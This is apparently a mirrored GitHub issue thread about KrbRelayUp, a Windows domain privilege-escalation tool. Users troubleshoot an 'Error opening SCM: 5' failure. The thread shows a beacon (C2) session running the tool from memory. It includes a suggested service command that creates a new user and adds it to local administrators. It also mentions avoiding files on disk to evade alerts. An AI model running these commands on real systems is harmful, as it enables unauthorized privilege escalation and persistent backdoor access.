Giters

Dec0ne / KrbRelayUp

KrbRelayUp - a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Error opening SCM: 5

frbor opened this issue · comments

commented

When I run the tool I get the error Error opening SCM: 5:

krbrelayup-scm-5

Do you have any idea what blocks this?

It looks like OpenSCManager fails

KrbRelayUp/KrbRelayUp/KrbSCM.cs

Line 56 in 6564f0f

IntPtr hScm = OpenSCManager("127.0.0.1", null, ScmAccessRights.Connect | ScmAccessRights.CreateService);
but not sure what can cause this?

For reference, when running the same command as administrator it runs without any error.

commented

I am actually having the same exact issue in a brand new detectionlab environment in azure. Everything works fine until that step and I get the same SCM: 5

commented

Can you confirm that the high priv ticket was imported? (Use klist command)
If so, try to run krbrelayup.exe krbscm after getting this error and making sure that the ticket is indeed in klist.
Let me know if that helps.

commented

Thanks for replying to this issue!

I confirm that I have a ticket which I can find using klist:

Cached Tickets: (1)

#0>     Client: Administrator @ (...)

Using KrbRelayUp.exe krbscm however, I get the same error:

KrbRelayUp.exe krbscm -s test-test2
KrbRelayUp - Relaying you to SYSTEM

[+] Using ticket to connect to Service Manger
[+] AcquireCredentialsHandleHook called for package N
[+] Changing to Kerberos package
[+] InitializeSecurityContextHook called for target H
[+] InitializeSecurityContext status = 0x00090312
[-] Error opening SCM: 5
commented

I have just confirmed the same thing as well!

beacon> shell klist
[*] Tasked beacon to run: klist
[+] host called home, sent: 36 bytes
[+] received output:

Current LogonId is 0:0x363b460

Cached Tickets: (1)

#0> Client: Administrator @ WINDOMAIN.LOCAL
Server: HOST/WIN10 @ WINDOMAIN.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize
Start Time: 5/10/2022 12:36:16 (local)
End Time: 5/10/2022 22:36:16 (local)
Renew Time: 5/17/2022 12:36:16 (local)
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

beacon> execute-assembly /Library/Tools/KrbRelayStuff/KrbRelayUp.exe krbscm
[*] Tasked beacon to run .NET program: KrbRelayUp.exe krbscm
[+] host called home, sent: 481847 bytes
[+] received output:
KrbRelayUp - Relaying you to SYSTEM

[+] Using ticket to connect to Service Manger
[+] AcquireCredentialsHandleHook called for package N
[+] Changing to Kerberos package
[+] InitializeSecurityContextHook called for target H
[+] InitializeSecurityContext status = 0x00090312
[+] InitializeSecurityContextHook called for target H
[+] InitializeSecurityContext status = 0x00000000
[-] Error opening SCM: 5

commented

Same, having this error.

commented

When using the tool from memory you have to specify --ServiceCommand since the default will be "{ToolPathOnDisk} system {DesktopSessionToSpawnCmdIn}" (ie: C:\Tools\KrbRelayUp.exe system 1) and since it's not on disk the service will fail upon execution.
Try specifying --ServiceCommand "cmd.exe /c net user test QWERTY123 /add && net localgroup administrators test /add" for example.

commented

Wonder if you've had a look at the U2U escalation using user account? @Dec0ne

commented

Not sure if the comment above was related to this issue (since the tool is on disk), but I tried with --ServiceCommand argument as specified, and that did not help.

commented

@Dec0ne I've been using service command to execute a new instance of the beacon I dropped on disk, I also tried the new localgroup command you posted above and got the same result i posted previously.

commented

Same, I've always used the sc command. We don't really use the spawn CMD thing because we don't drop files on disk as it could raise alerts easier.

commented

Same here, the issue for me is arising when I run from memory.

commented

Hi,

I have exactly the same issue.

When debugging the network traffic I recognized that the rpc bind request ends up with a bind_nak response and the error code "Invalid checksum" which meaning is according to MS RPC Documentation (https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rpce/6f81bffe-8fce-498a-addf-94654a57b329) "This rejection code is used when an unrecoverable error is detected by the underlying security package."

The ticket is in the cache, the user has local admin privilege. However the SCMUACBypass part seams to fail because of unknown reason.

Is anyone aware if there exists a specific (hardening) configuration would prevent leveraging hte ticket locally via SCMUACBypass?

Any ideas would be very appreciated. Thanks.